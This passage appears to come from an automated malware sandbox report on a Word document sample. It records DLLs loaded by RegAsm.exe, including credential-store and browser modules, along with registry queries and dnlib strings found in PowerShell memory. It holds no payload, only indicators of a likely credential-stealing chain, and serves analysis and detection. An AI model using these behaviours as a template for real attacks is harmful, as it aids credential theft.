                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: xrrwwstCMd.LNK.0.drLNK file: ..\..\..\..\..\Desktop\xrrwwstCMd.docx
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: xrrwwstCMd.docxInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                    Source: xrrwwstCMd.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                    Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                    Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: ~WRD0000.tmp.0.drInitial sample: OLE summary template = B0E0C498
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
